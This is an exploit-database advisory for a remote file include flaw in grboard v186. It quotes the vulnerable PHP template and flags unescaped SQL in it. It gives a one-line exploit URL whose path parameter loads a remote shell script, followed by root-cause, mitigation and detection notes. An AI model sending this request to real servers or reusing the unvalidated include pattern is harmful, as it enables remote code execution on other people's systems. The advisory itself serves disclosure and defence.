grboard v186 Remote File Include Vulnerability

2010-05-30T00:00:00
ID 1337DAY-ID-12460
Type zdt
Reporter untouch
Modified 2010-05-30T00:00:00

Description

Exploit for php platform in category web applications

                                        
==============================================
grboard v186 Remote File Include Vulnerability
==============================================

# Author	  : untouch
# Location        : jakarta - Indonesia
# Situs           : antijasakom[dot]org, autosaved[dot]wordpress[dot]com
# Contact         : unkn0wn[dot]cr3w[at]ymail[dot]com
# Script: http://sirini.net/grboard/board.php?id=grskin&articleNo=82
# Download: http://sirini.net/grboard/download.php?id=grskin&articleNo=82&num=1


######################################################################
#<div class="latestGalleryTitle"><a href="<?php echo $grboard; ?>/board.php?id=<?php echo $id; ?>"><?php echo $latestTitle; ?></a></div>
#<?php
#// Load the GD thumbnail engine used by the latest-gallery widget
#// NOTE(review): $path is not assigned anywhere in this excerpt before it reaches
#// include_once. The advisory's request supplies it as the "path" query parameter,
#// presumably via register_globals or a similar request-to-variable import (not shown here).
#include_once $path."/thumbnail.php";
#
#// Loop over posts
#while($latest = mysql_fetch_array($getData))
#{
#	// For each post, fetch and process the first attached file
#	$target = $latest['no'];
#	// NOTE(review): $id and $target are interpolated into the SQL string unescaped, and the
#	// leading @ hides any fetch error. Where $id originates is not visible in this excerpt;
#	// confirm it is validated before this template runs.
#	$file = @mysql_fetch_array(mysql_query("select file_route1 from {$dbFIX}pds_save where id = '$id' and article_num = '$target'"));
#	?>
#<div class="latestGalleryPhoto"><a href="<?php echo $grboard; ?>/board.php?id=<?php echo $id; ?>&articleNo=<?php echo $latest['no']; ?>">
#<?php echo makeLatestThumb($grboard."/".$file['file_route1'], $path, $id, $grboard, 100, 100); ?></a></div>
#	<?php
#} # while
#?>
#<div class="latestGalleryClear"></div>
######################################################################

#######################################################################################################
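Exploit: http://[target]/[path]/latest/sirini_gallery2_play/list.php?path=http://[shellscript]
#######################################################################################################

# Root cause : the excerpt above builds its include_once target from $path without assigning $path itself, so a direct request to list.php can supply the value through the "path" parameter. How the parameter becomes a variable (register_globals or a similar import) is not shown in the excerpt. Fetching the include over HTTP also depends on PHP's remote-include settings (allow_url_include; allow_url_fopen on PHP before 5.2).
# Mitigation : set $path from a fixed server-side value in the including script and refuse direct requests to skin files such as list.php; keep register_globals and allow_url_include disabled.
# Detection  : web-server log entries for latest/*/list.php whose path= value contains a URL scheme.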


#Special Thanks  : 

	- Gorontalo Defacer : cr4wl3r, bl4ck_3n91n3, aries.deris, Tawon Sparta
	
	- AntiJasakom Crew : Shamus, boys_rvn1609, 5ynL0rd, kqaj, dbugr, kiddies, g4pt3k
	
	- all Indogamers Admin & Moderator
	
# Note : Don't Be Afraid to Attack Your Own Network ~






